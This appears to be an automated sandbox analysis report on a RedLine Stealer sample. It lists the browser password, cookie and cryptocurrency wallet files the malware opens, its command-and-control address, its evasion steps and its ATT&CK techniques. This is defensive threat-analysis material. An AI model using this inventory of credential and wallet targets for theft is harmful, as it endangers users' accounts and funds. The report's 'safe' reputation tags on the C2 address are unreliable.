                    Source: Yara matchFile source: 10.2.TmfmVKU.exe.43b1478.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.TmfmVKU.exe.43b1478.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.lZ8NRWShfC.exe.3f30380.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.TmfmVKU.exe.4399658.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.lZ8NRWShfC.exe.3f30380.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.lZ8NRWShfC.exe.3f18560.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.TmfmVKU.exe.4399658.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1761835638.0000000003F18000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1870267028.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1858249007.0000000004399000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: lZ8NRWShfC.exe PID: 6884, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: lZ8NRWShfC.exe PID: 7216, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: TmfmVKU.exe PID: 7308, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: TmfmVKU.exe PID: 7608, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                    Source: Yara matchFile source: 0.2.lZ8NRWShfC.exe.3f18560.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.lZ8NRWShfC.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.TmfmVKU.exe.43b1478.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.TmfmVKU.exe.43b1478.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.lZ8NRWShfC.exe.3f30380.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.TmfmVKU.exe.4399658.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.lZ8NRWShfC.exe.3f30380.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.lZ8NRWShfC.exe.3f18560.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.TmfmVKU.exe.4399658.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1761835638.0000000003F18000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1870267028.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1858249007.0000000004399000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: lZ8NRWShfC.exe PID: 6884, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: lZ8NRWShfC.exe PID: 7216, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: TmfmVKU.exe PID: 7308, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: TmfmVKU.exe PID: 7608, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.lZ8NRWShfC.exe.3f18560.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.lZ8NRWShfC.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.TmfmVKU.exe.43b1478.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.TmfmVKU.exe.43b1478.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.lZ8NRWShfC.exe.3f30380.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.TmfmVKU.exe.4399658.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.lZ8NRWShfC.exe.3f30380.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.lZ8NRWShfC.exe.3f18560.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.TmfmVKU.exe.4399658.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1761835638.0000000003F18000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1870267028.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1858249007.0000000004399000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: lZ8NRWShfC.exe PID: 6884, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: lZ8NRWShfC.exe PID: 7216, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: TmfmVKU.exe PID: 7308, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: TmfmVKU.exe PID: 7608, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		111
                    Process Injection                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		321
                    Security Software Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		11
                    Disable or Modify Tools                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		241
                    Virtualization/Sandbox Evasion                    		Security Account Manager241
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture12
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
                    Obfuscated Files or Information                    		LSA Secrets2
                    File and Directory Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                    Software Packing                    		Cached Domain Credentials113
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467127 Sample: lZ8NRWShfC.exe Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 50 api.ip.sb 2->50 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Antivirus / Scanner detection for submitted sample 2->58 60 10 other signatures 2->60 8 lZ8NRWShfC.exe 7 2->8         started        12 TmfmVKU.exe 2->12         started        signatures3 process4 file5 42 C:\Users\user\AppData\Roaming\TmfmVKU.exe, PE32 8->42 dropped 44 C:\Users\user\...\TmfmVKU.exe:Zone.Identifier, ASCII 8->44 dropped 46 C:\Users\user\AppData\Local\...\tmp51ED.tmp, XML 8->46 dropped 48 C:\Users\user\AppData\...\lZ8NRWShfC.exe.log, ASCII 8->48 dropped 62 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->62 64 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 8->64 66 Uses schtasks.exe or at.exe to add and modify task schedules 8->66 68 Adds a directory exclusion to Windows Defender 8->68 14 lZ8NRWShfC.exe 15 47 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        26 2 other processes 8->26 70 Multi AV Scanner detection for dropped file 12->70 72 Injects a PE file into a foreign processes 12->72 22 TmfmVKU.exe 12->22         started        24 schtasks.exe 12->24         started        signatures6 process7 dnsIp8 52 185.222.58.91, 49732, 49734, 49735 ROOTLAYERNETNL Netherlands 14->52 28 conhost.exe 14->28         started        74 Loading BitLocker PowerShell Module 18->74 30 conhost.exe 18->30         started        32 WmiPrvSE.exe 18->32         started        34 conhost.exe 20->34         started        76 Tries to harvest and steal browser information (history, passwords, etc) 22->76 78 Tries to steal Crypto Currency Wallets 22->78 36 conhost.exe 22->36         started        38 conhost.exe 24->38         started        40 conhost.exe 26->40         started        signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    lZ8NRWShfC.exe68%ReversingLabsByteCode-MSIL.Spyware.RedLine
                    lZ8NRWShfC.exe100%AviraHEUR/AGEN.1362875
                    lZ8NRWShfC.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\TmfmVKU.exe68%ReversingLabsByteCode-MSIL.Spyware.RedLine

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                    http://tempuri.org/0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing0%URL Reputationsafe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/actor/next0%URL Reputationsafe
                    https://ipinfo.io/ip%appdata%0%Avira URL Cloudsafe
                    https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                    https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/EnvironmentSettings0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/CheckConnectResponse0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/SetEnvironmentme(0%Avira URL Cloudsafe
                    http://schemas.datacontract.org/2004/07/0%Avira URL Cloudsafe
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%Avira URL Cloudsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/GetUpdates(0%Avira URL Cloudsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/CheckConnect0%Avira URL Cloudsafe
                    https://api.ip.sb0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/SetEnvironment0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/SetEnviron0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/SetEnvironmentResponse0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/GetUpdates0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/VerifyUpdateResponse0%Avira URL Cloudsafe
                    http://185.222.58.91:556150%Avira URL Cloudsafe
                    https://api.ipify.orgcookies//settinString.Removeg0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/GetUpdatesResponse0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/SetEnvironmentde0%Avira URL Cloudsafe
                    http://185.222.58.91:55615/0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/VerifyUpdate0%Avira URL Cloudsafe
                    http://tempuri.org/00%Avira URL Cloudsafe
                    http://185.222.58.91:50%Avira URL Cloudsafe
                    185.222.58.91:556150%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ip.sb
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://185.222.58.91:55615/true
                      • Avira URL Cloud: safe
                      		unknown
                      185.222.58.91:55615true
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://ipinfo.io/ip%appdata%lZ8NRWShfC.exe, lZ8NRWShfC.exe, 00000008.00000002.1870267028.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TmfmVKU.exe, 0000000A.00000002.1858249007.0000000004399000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://duckduckgo.com/chrome_newtablZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, tmp3C74.tmp.14.dr, tmp526.tmp.14.dr, tmp516.tmp.14.dr, tmp73A6.tmp.14.dr, tmp3C85.tmp.14.dr, tmp50CB.tmp.8.dr, tmp3CB5.tmp.14.dr, tmp509A.tmp.8.dr, tmp50DB.tmp.8.dr, tmp8760.tmp.8.dr, tmp1959.tmp.8.dr, tmp73B7.tmp.14.dr, tmp7386.tmp.14.dr, tmp3C64.tmp.14.dr, tmp8750.tmp.8.dr, tmpAA2B.tmp.14.dr, tmp872E.tmp.8.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://duckduckgo.com/ac/?q=lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, tmp3C74.tmp.14.dr, tmp526.tmp.14.dr, tmp516.tmp.14.dr, tmp73A6.tmp.14.dr, tmp3C85.tmp.14.dr, tmp50CB.tmp.8.dr, tmp3CB5.tmp.14.dr, tmp509A.tmp.8.dr, tmp50DB.tmp.8.dr, tmp8760.tmp.8.dr, tmp1959.tmp.8.dr, tmp73B7.tmp.14.dr, tmp7386.tmp.14.dr, tmp3C64.tmp.14.dr, tmp8750.tmp.8.dr, tmpAA2B.tmp.14.dr, tmp872E.tmp.8.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icolZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, tmp3C74.tmp.14.dr, tmp526.tmp.14.dr, tmp516.tmp.14.dr, tmp73A6.tmp.14.dr, tmp3C85.tmp.14.dr, tmp50CB.tmp.8.dr, tmp3CB5.tmp.14.dr, tmp509A.tmp.8.dr, tmp50DB.tmp.8.dr, tmp8760.tmp.8.dr, tmp1959.tmp.8.dr, tmp73B7.tmp.14.dr, tmp7386.tmp.14.dr, tmp3C64.tmp.14.dr, tmp8750.tmp.8.dr, tmpAA2B.tmp.14.dr, tmp872E.tmp.8.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymouslZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Endpoint/CheckConnectResponselZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.datacontract.org/2004/07/lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002C75000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXlZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Endpoint/SetEnvironmentme(TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Endpoint/EnvironmentSettingslZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://api.ip.sb/geoip%USERPEnvironmentROFILE%lZ8NRWShfC.exe, lZ8NRWShfC.exe, 00000008.00000002.1870267028.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TmfmVKU.exe, 0000000A.00000002.1858249007.0000000004399000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://api.ip.sblZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/soap/envelope/TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Endpoint/GetUpdates(TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002C75000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, tmp3C74.tmp.14.dr, tmp526.tmp.14.dr, tmp516.tmp.14.dr, tmp73A6.tmp.14.dr, tmp3C85.tmp.14.dr, tmp50CB.tmp.8.dr, tmp3CB5.tmp.14.dr, tmp509A.tmp.8.dr, tmp50DB.tmp.8.dr, tmp8760.tmp.8.dr, tmp1959.tmp.8.dr, tmp73B7.tmp.14.dr, tmp7386.tmp.14.dr, tmp3C64.tmp.14.dr, tmp8750.tmp.8.dr, tmpAA2B.tmp.14.dr, tmp872E.tmp.8.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Endpoint/CheckConnectlZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, tmp3C74.tmp.14.dr, tmp526.tmp.14.dr, tmp516.tmp.14.dr, tmp73A6.tmp.14.dr, tmp3C85.tmp.14.dr, tmp50CB.tmp.8.dr, tmp3CB5.tmp.14.dr, tmp509A.tmp.8.dr, tmp50DB.tmp.8.dr, tmp8760.tmp.8.dr, tmp1959.tmp.8.dr, tmp73B7.tmp.14.dr, tmp7386.tmp.14.dr, tmp3C64.tmp.14.dr, tmp8750.tmp.8.dr, tmpAA2B.tmp.14.dr, tmp872E.tmp.8.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.ecosia.org/newtab/lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, tmp3C74.tmp.14.dr, tmp526.tmp.14.dr, tmp516.tmp.14.dr, tmp73A6.tmp.14.dr, tmp3C85.tmp.14.dr, tmp50CB.tmp.8.dr, tmp3CB5.tmp.14.dr, tmp509A.tmp.8.dr, tmp50DB.tmp.8.dr, tmp8760.tmp.8.dr, tmp1959.tmp.8.dr, tmp73B7.tmp.14.dr, tmp7386.tmp.14.dr, tmp3C64.tmp.14.dr, tmp8750.tmp.8.dr, tmpAA2B.tmp.14.dr, tmp872E.tmp.8.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Endpoint/VerifyUpdateResponselZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.chiark.greenend.org.uk/~sgtatham/putty/0lZ8NRWShfC.exe, TmfmVKU.exe.0.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Endpoint/SetEnvironTmfmVKU.exe, 0000000E.00000002.1966151891.0000000002D95000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Endpoint/SetEnvironmentTmfmVKU.exe, 0000000E.00000002.1966151891.0000000002D95000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Endpoint/SetEnvironmentResponselZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://185.222.58.91:55615lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002C75000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Endpoint/GetUpdatesTmfmVKU.exe, 0000000E.00000002.1966151891.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
